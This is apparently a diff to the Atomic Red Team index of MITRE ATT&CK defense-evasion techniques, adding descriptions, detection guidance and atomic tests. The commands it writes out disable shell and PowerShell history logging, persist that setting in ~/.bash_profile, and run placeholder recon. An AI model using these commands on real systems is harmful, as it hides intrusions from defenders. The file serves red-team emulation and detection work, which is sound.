+ - source_name: Sophos PowerShell command audit
+ url: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit
+ description: jak. (2020, June 27). Live Discover - PowerShell command audit.
+ Retrieved August 21, 2020.
+ - source_name: Sophos PowerShell Command History Forensics
+ url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
+ description: Vikas, S. (2020, August 26). PowerShell Command History Forensics.
+ Retrieved September 4, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Impair Command History Logging
+ description: "Adversaries may impair command history logging to hide commands
+ they run on a compromised system. Various command interpreters keep track
+ of the commands users type in their terminal so that users can retrace what
+ they've done. \n\nOn Linux and macOS, command history is tracked in a file
+ pointed to by the environment variable HISTFILE. When a user
+ logs off a system, this information is flushed to a file in the user's home
+ directory called ~/.bash_history. The HISTCONTROL
+ environment variable keeps track of what should be saved by the history
+ command and eventually into the ~/.bash_history file when a user
+ logs out. HISTCONTROL does not exist by default on macOS, but
+ can be set by the user and will be respected.\n\nAdversaries may clear the
+ history environment variable (unset HISTFILE) or set the command
+ history size to zero (export HISTFILESIZE=0) to prevent logging
+ of commands. Additionally, HISTCONTROL can be configured to ignore
+ commands that start with a space by simply setting it to \"ignorespace\".
+ HISTCONTROL can also be set to ignore duplicate commands by setting
+ it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\"
+ which covers both of the previous examples. This means that “ ls” will not
+ be saved, but “ls” would be saved by history. Adversaries can abuse this to
+ operate without leaving traces by simply prepending a space to all of their
+ terminal commands.\n\nOn Windows systems, the PSReadLine module
+ tracks commands used in all PowerShell sessions and writes them to a file
+ ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
+ by default). Adversaries may change where these logs are saved using Set-PSReadLineOption
+ -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt
+ to stop receiving logs. Additionally, it is possible to turn off logging to
+ this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle
+ SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation:
+ Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History
+ Forensics)"
+ id: attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-16T18:25:12.727Z'
+ created: '2020-02-21T20:56:06.498Z'
+ x_mitre_contributors:
+ - Vikas Singh, Sophos
+ - Emile Kenning, Sophos
+ x_mitre_version: '2.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Log analysis
+ x_mitre_detection: "Correlating a user session with a distinct lack of new commands
+ in their .bash_history can be a clue to suspicious behavior.
+ Additionally, users checking or changing their HISTCONTROL, HISTFILE,
+ or HISTFILESIZE environment variables may be suspicious.\n\nMonitor
+ for modification of PowerShell command history settings through processes
+ being created with -HistorySaveStyle SaveNothing command-line
+ arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle
+ SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. "
+ x_mitre_data_sources:
+ - PowerShell logs
+ - Process command-line parameters
+ - Environment variable
+ - File monitoring
+ - Authentication logs
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ identifier: T1562.003
+ atomic_tests:
+ - name: Disable history collection
+ auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
+ description: 'Disables history collection in shells
+
+'
+ supported_platforms:
+ - linux
+ - macos
+ input_arguments:
+ evil_command:
+ description: Command to run after shell history collection is disabled
+ type: String
+ default: whoami
+ executor:
+ command: |
+ export HISTCONTROL=ignoreboth
+ #{evil_command}
+ name: sh
+ - name: Mac HISTCONTROL
+ auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d
+ description: "The HISTCONTROL variable is set to ignore (not write to the history
+ file) command that are a duplicate of something already in the history \nand
+ commands that start with a space. This atomic sets this variable in the current
+ session and also writes it to the current user's ~/.bash_profile \nso that
+ it will apply to all future settings as well.\nhttps://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol\n"
+ supported_platforms:
+ - macos
+ - linux
+ executor:
+ steps: |
+ 1. export HISTCONTROL=ignoreboth
+ 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
+ 3. ls
+ 4. whoami > recon.txt
+ name: manual
T1562:
technique:
id: attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529
@@ -27244,7 +31111,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-07-09T14:43:42.718Z'
+ modified: '2020-10-19T16:31:35.249Z'
created: '2020-02-21T20:22:13.470Z'
x_mitre_platforms:
- Linux
@@ -27505,7 +31372,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T21:43:29.196Z'
+ modified: '2020-10-16T18:09:49.074Z'
created: '2017-05-31T21:30:55.892Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -27548,8 +31415,19 @@ defense-evasion:
elevation_required: true
T1202:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2018-04-18T17:59:24.739Z'
+ modified: '2020-06-20T22:09:22.559Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
external_references:
- source_name: mitre-attack
external_id: T1202
@@ -27566,40 +31444,29 @@ defense-evasion:
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
source_name: RSA Forfiles Aug 2017
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- name: Indirect Command Execution
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-06-20T22:09:22.559Z'
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application control
+ - Application control by file name or path
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- Windows event logs
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application control
- - Application control by file name or path
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ x_mitre_version: '1.1'
identifier: T1202
atomic_tests:
- name: Indirect Command Execution - pcalua.exe
@@ -28532,6 +32399,21 @@ defense-evasion:
name: powershell
T1036.001:
technique:
+ created: '2020-02-10T19:49:46.752Z'
+ modified: '2020-02-10T19:52:47.724Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52
+ description: |-
+ Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
+
+ Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.
+ name: Invalid Code Signature
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1036.001
@@ -28540,34 +32422,19 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Invalid Code Signature
- description: |-
- Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
-
- Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.
- id: attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-02-10T19:52:47.724Z'
- created: '2020-02-10T19:49:46.752Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: Collect and analyze signing certificate metadata and check
- signature validity on software that executes within the environment, look
- for invalid signatures as well as unusual certificate characteristics and
- outliers.
+ x_mitre_platforms:
+ - macOS
+ - Windows
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Binary file metadata
- x_mitre_platforms:
- - macOS
- - Windows
+ x_mitre_detection: Collect and analyze signing certificate metadata and check
+ signature validity on software that executes within the environment, look
+ for invalid signatures as well as unusual certificate characteristics and
+ outliers.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1149:
technique:
@@ -28637,6 +32504,12 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-640
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/640.html
- source_name: Man LD.SO
url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
@@ -28666,7 +32539,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-15T21:59:25.358Z'
+ modified: '2020-09-16T16:49:46.904Z'
created: '2020-03-13T20:09:59.569Z'
x_mitre_platforms:
- Linux
@@ -28679,7 +32552,7 @@ defense-evasion:
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -29431,7 +33304,7 @@ defense-evasion:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-07-13T21:23:01.762Z'
+ modified: '2020-10-21T02:41:11.743Z'
created: '2020-02-11T19:01:56.887Z'
x_mitre_data_sources:
- File monitoring
@@ -29462,12 +33335,13 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g., a user has an active
login session but has not entered the building or does not have VPN access)."
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
+ - Network
atomic_tests: []
T1578:
technique:
@@ -29477,8 +33351,8 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1578
- source_name: Mandiant M-Trends 2020
url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -29492,7 +33366,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-19T14:46:00.117Z'
+ modified: '2020-09-14T19:55:23.798Z'
created: '2019-08-30T18:03:05.864Z'
x_mitre_detection: Establish centralized logging for the activity of cloud compute
infrastructure components. Monitor for suspicious sequences of events, such
@@ -29569,7 +33443,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T22:52:55.930Z'
+ modified: '2020-08-13T20:02:49.641Z'
created: '2017-05-31T21:31:23.587Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -29581,7 +33455,7 @@ defense-evasion:
x_mitre_detection: |-
Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
- Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
+ Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).
x_mitre_defense_bypassed:
@@ -29596,7 +33470,7 @@ defense-evasion:
- Bartosz Jerzman
- Travis Smith, Tripwire
- David Lu, Tripwire
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
identifier: T1112
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
@@ -29725,6 +33599,65 @@ defense-evasion:
'
name: powershell
+ T1601:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1601
+ url: https://attack.mitre.org/techniques/T1601
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Modify System Image
+ description: |-
+ Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
+
+ To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.
+ id: attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-22T17:50:47.635Z'
+ created: '2020-10-19T19:42:19.740Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: "Most embedded network devices provide a command to print
+ the version of the currently running operating system. Use this command to
+ query the operating system for its version number and compare it to what is
+ expected for the device in question. Because this method may be used in conjunction
+ with [Patch System Image](https://attack.mitre.org/techniques/T1601/001),
+ it may be appropriate to also verify the integrity of the vendor provided
+ operating system image file. \n\nCompare the checksum of the operating system
+ file with the checksum of a known good copy from a trusted source. Some embedded
+ network device platforms may have the capability to calculate the checksum
+ of the file, while others may not. Even for those platforms that have the
+ capability, it is recommended to download a copy of the file to a trusted
+ computer to calculate the checksum with software that is not compromised.
+ \ (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany
+ vendors of embedded network devices can provide advanced debugging support
+ that will allow them to work with device owners to validate the integrity
+ of the operating system running in memory. If a compromise of the operating
+ system is suspected, contact the vendor technical support and seek such services
+ for a more thorough inspection of the current running system. (Citation:
+ Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)"
+ x_mitre_data_sources:
+ - Network device run-time memory
+ - Network device configuration
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1218.005:
technique:
id: attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade
@@ -30388,6 +34321,151 @@ defense-evasion:
'
name: powershell
+ T1599.001:
+ technique:
+ created: '2020-10-19T16:48:08.241Z'
+ modified: '2020-10-21T01:45:58.951Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de
+ description: "Adversaries may bridge network boundaries by modifying a network
+ device’s Network Address Translation (NAT) configuration. Malicious modifications
+ to NAT may enable an adversary to bypass restrictions on traffic routing that
+ otherwise separate trusted and untrusted networks.\n\nNetwork devices such
+ as routers and firewalls that connect multiple networks together may implement
+ NAT during the process of passing packets between networks. When performing
+ NAT, the network device will rewrite the source and/or destination addresses
+ of the IP address header. Some network designs require NAT for the packets
+ to cross the border device. A typical example of this is environments where
+ internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen
+ an adversary gains control of a network boundary device, they can either leverage
+ existing NAT configurations to send traffic between two separated networks,
+ or they can implement NAT configurations of their own design. In the case
+ of network designs that require NAT to function, this enables the adversary
+ to overcome inherent routing limitations that would normally prevent them
+ from accessing protected systems behind the border device. In the case of
+ network designs that do not require NAT, address translation can be used by
+ adversaries to obscure their activities, as changing the addresses of packets
+ that traverse a network boundary device can make monitoring data transmissions
+ more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ to change the operating system of a network device, implementing their own
+ custom NAT mechanisms to further obscure their activities"
+ name: Network Address Translation Traversal
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1599.001
+ url: https://attack.mitre.org/techniques/T1599/001
+ - source_name: RFC1918
+ url: https://tools.ietf.org/html/rfc1918
+ description: IETF Network Working Group. (1996, February). Address Allocation
+ for Private Internets. Retrieved October 20, 2020.
+ x_mitre_platforms:
+ - Network
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_detection: |-
+ Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary.
+
+ Monitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
+ T1599:
+ technique:
+ created: '2020-10-19T16:08:29.817Z'
+ modified: '2020-10-21T01:45:59.246Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166
+ description: |-
+ Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
+
+ Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
+
+ When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
+ name: Network Boundary Bridging
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1599
+ url: https://attack.mitre.org/techniques/T1599
+ x_mitre_platforms:
+ - Network
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_detection: |-
+ Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question. Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.
+
+ Monitor the border network device’s configuration to validate that the policy enforcement sections are what was intended. Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.
+ x_mitre_defense_bypassed:
+ - Router ACL
+ - Firewall
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ atomic_tests: []
+ T1556.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1556.004
+ url: https://attack.mitre.org/techniques/T1556/004
+ - source_name: FireEye - Synful Knock
+ url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
+ description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
+ Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ description: |-
+ Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
+
+ [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)
+ name: Network Device Authentication
+ id: attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-21T02:41:11.550Z'
+ created: '2020-10-19T17:58:04.155Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: |-
+ Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
+
+ Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1070.005:
technique:
external_references:
@@ -30570,7 +34648,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:14:08.350Z'
+ modified: '2020-09-16T19:24:20.601Z'
created: '2017-05-31T21:30:32.662Z'
x_mitre_is_subtechnique: false
x_mitre_version: '1.1'
@@ -31405,64 +35483,168 @@ defense-evasion:
Restart-Computer -Confirm
name: powershell
elevation_required: true
+ T1601.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1601.001
+ url: https://attack.mitre.org/techniques/T1601/001
+ - source_name: Killing the myth of Cisco IOS rootkits
+ url: https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf
+ description: Sebastian 'topo' Muñiz. (2008, May). Killing the myth of Cisco
+ IOS rootkits. Retrieved October 20, 2020.
+ - source_name: Killing IOS diversity myth
+ url: https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf
+ description: 'Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August).
+ Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode
+ design. Retrieved October 20, 2020.'
+ - source_name: Cisco IOS Shellcode
+ url: http://2015.zeronights.org/assets/files/05-Nosenko.pdf
+ description: 'George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved
+ October 21, 2020.'
+ - source_name: Cisco IOS Forensics Developments
+ url: https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf
+ description: Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS
+ Forensics. Retrieved October 21, 2020.
+ - source_name: Juniper Netscreen of the Dead
+ url: https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf
+ description: Graeme Neilson . (2009, August). Juniper Netscreen of the Dead.
+ Retrieved October 20, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
